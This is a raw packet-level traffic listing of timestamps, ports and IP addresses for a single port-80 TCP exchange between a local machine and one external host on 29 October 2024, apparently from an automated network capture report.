Oct 29, 2024 06:59:26.944920063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944930077 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.944953918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944988012 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.944996119 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945023060 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945056915 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945064068 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945108891 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945142984 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945147991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945193052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945225954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945240021 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945261002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945293903 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945297003 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945347071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945398092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945436001 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945441961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945477009 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945511103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945522070 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945547104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945549011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945581913 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945615053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945625067 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945650101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945683956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945698977 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945718050 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945754051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945785046 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945786953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945822001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945828915 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945858002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945892096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945904970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.945944071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945979118 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.945991039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946013927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946053028 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946085930 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946099043 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946120977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946152925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946168900 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946187973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946193933 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946223021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946259022 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946293116 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946293116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946331024 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946363926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946372986 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946398973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946430922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946444035 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946466923 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946476936 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946500063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946535110 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946571112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946579933 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946604967 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946620941 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946640015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946672916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946681023 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946707010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946739912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946752071 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946774006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946806908 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946814060 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946841002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946873903 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946883917 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946908951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946944952 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.946954012 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.946978092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947011948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947021961 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947052002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947086096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947119951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947132111 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947154999 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947186947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947197914 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947221994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947228909 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947257996 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947290897 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947299957 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947351933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947386026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947391987 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947421074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947454929 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947488070 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947499037 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947523117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947557926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947571993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947592974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947597980 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947628021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947644949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947659969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947664022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947676897 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947693110 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947710037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947719097 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947731018 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947742939 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947746992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947766066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947771072 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947782993 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947799921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947814941 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947814941 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947830915 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947839022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947848082 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947865009 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947874069 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947880983 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947897911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947905064 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947916031 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947932959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947941065 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947949886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947966099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947978020 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.947982073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.947999001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.948000908 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.948014975 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.948031902 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.948041916 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.948046923 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.948065042 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.948076010 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.948080063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.948097944 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.948098898 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.948142052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.958910942 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.964562893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964617014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964653015 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.964688063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964756012 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964807034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964839935 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964850903 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.964881897 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.964891911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964926958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964978933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.964979887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965049028 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965082884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965090990 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965116978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965162992 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965212107 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965245008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965296030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965328932 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965329885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965365887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965373993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965401888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965435982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965444088 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965470076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965504885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965537071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965548992 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965572119 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965615034 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965625048 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965663910 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965676069 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965709925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965743065 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965750933 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965852976 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965893030 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.965904951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965939045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965972900 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.965986967 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966021061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966070890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966104031 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966116905 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966137886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966149092 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966172934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966216087 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966223001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966298103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966341972 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966352940 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966387033 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966420889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966453075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966463089 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966492891 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966787100 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966821909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966855049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966872931 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966936111 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.966979980 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.966988087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967040062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967073917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967107058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967139959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967158079 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967178106 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967190981 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967222929 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967243910 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967273951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967365980 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967401028 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967412949 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967452049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967484951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967504978 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967521906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967533112 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967557907 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967607021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967642069 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967658043 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967675924 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967680931 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967710972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967745066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967752934 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967780113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967814922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967844963 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967858076 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967863083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967878103 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967889071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967905998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967921972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967937946 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967947960 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967973948 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.967976093 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.967991114 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968007088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968022108 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968024969 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968039989 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968048096 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968065977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968075991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968082905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968097925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968122959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968132973 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968138933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968156099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968158007 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968170881 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968199968 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968225002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968240976 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968261957 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968261957 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968277931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968293905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968310118 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968321085 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968333960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968343973 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968349934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968365908 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968370914 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968380928 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968394995 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968405008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968421936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968437910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968455076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968460083 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968478918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968482018 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968497038 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968513012 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968528986 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968533993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968544960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968554020 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968566895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968584061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968588114 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968600035 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968617916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968636990 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968642950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968656063 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968667030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968682051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968697071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968713045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968718052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968729973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968741894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968746901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968763113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968765020 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968780041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968805075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968805075 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968822956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968839884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968848944 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968864918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968878984 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968880892 CET	80	49769	185.215.113.16	192.168.2.6
